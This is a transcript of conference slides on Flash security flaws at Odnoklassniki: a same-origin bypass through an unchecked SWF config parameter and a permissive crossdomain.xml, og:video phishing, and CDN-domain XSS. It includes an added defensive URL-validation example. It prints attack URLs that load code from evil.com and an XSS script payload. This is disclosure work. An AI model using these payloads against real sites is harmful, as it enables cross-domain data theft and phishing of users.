Transcript
Flash is dead. Long live Flash!
Alexandra Svatikova, Odnoklassniki
Flash security model
• Application sandbox
• Security domain / application domain
#1 Same-Origin Policy bypass
Jakub Żoczek (@zoczus)
http://st.mycdn.me/vulnerable.swf?conf=config.swf

loader.load(
    new URLRequest(loaderInfo.parameters.conf),
    new LoaderContext(false, new ApplicationDomain(), SecurityDomain.currentDomain));
addChild(loader);

The conf parameter comes straight from the query string, and loading it with SecurityDomain.currentDomain runs the loaded SWF with the privileges of st.mycdn.me:

http://st.mycdn.me/vulnerable.swf?conf=http://evil.com/config.swf
evil.com -> mycdn.me

http://ok.ru/crossdomain.xml
<cross-domain-policy>
  ...
  <allow-access-from domain="st.mycdn.me"/>
  <allow-access-from domain="ok.ru"/>
  <allow-access-from domain="*.ok.ru"/>
  ...
</cross-domain-policy>

Because ok.ru's crossdomain.xml trusts st.mycdn.me, code running in the CDN domain can also read ok.ru:
evil.com -> ok.ru
#2 Phishing
... <meta property="og:video" content="http://tv.ru/player.swf?conf=http://tv.ru/config.swf"> ...

<meta property="og:video" content="http://tv.ru/player.swf?conf=http://tv.ru.evil.com/config.swf">
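Both the ?conf= issues above come down to a player accepting a config URL from its query string. The check below is an added example (not code from the talk or from any of the sites named): it resolves the parameter against the player's own URL and compares the resulting host against an allowlist on a dot boundary, so a value like tv.ru.evil.com, which defeats a plain substring test, is rejected. The base URL, allowlist and inputs are assumed values.

```javascript
// Added example (not code from the talk): how a player should vet a
// "conf"-style URL parameter before passing it to a loader. The base URL,
// allowlist and sample inputs are constructed for illustration.
const BASE_URL = "http://tv.ru/player.swf";        // assumed player location
const ALLOWED_HOSTS = ["tv.ru", "st.mycdn.me"];    // assumed config hosts

// Weak check: a substring test is defeated by a host such as
// tv.ru.evil.com, the shape of value shown on the phishing slide.
function weakIsAllowed(conf) {
  return conf.indexOf("tv.ru") !== -1;
}

// Hardened check: resolve the parameter against the player's own URL
// (so a bare "config.swf" stays on tv.ru), require http(s), and accept
// the host only on an exact or dot-boundary match against the allowlist.
function isAllowedConfUrl(conf, allowedHosts = ALLOWED_HOSTS, base = BASE_URL) {
  let url;
  try {
    url = new URL(conf, base);
  } catch (e) {
    return false;                                  // unparsable input is rejected
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  const host = url.hostname.toLowerCase();
  return allowedHosts.some(
    (allowed) => host === allowed || host.endsWith("." + allowed)
  );
}
```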
#3 XSS in CDN domain
http://st.mycdn.me/vulnerable.swf?param=username

_root.createTextField("Inputbox", 0, 20, 20, 320, 240);
_root.Inputbox.html = true;
_root.Inputbox.htmlText = "Welcome " + _root.param;

http://st.mycdn.me/vulnerable.swf?param=<script>alert('xss')</script>

$ host st.mycdn.me
st.mycdn.me has address 217.20.152.226
$
$ host videoplayer.ok.ru
videoplayer.ok.ru is an alias for st.mycdn.me.
videoplayer.ok.ru has address 217.20.152.226

http://videoplayer.ok.ru/vulnerable.swf?param=alert('xss')
Thank you for your attention!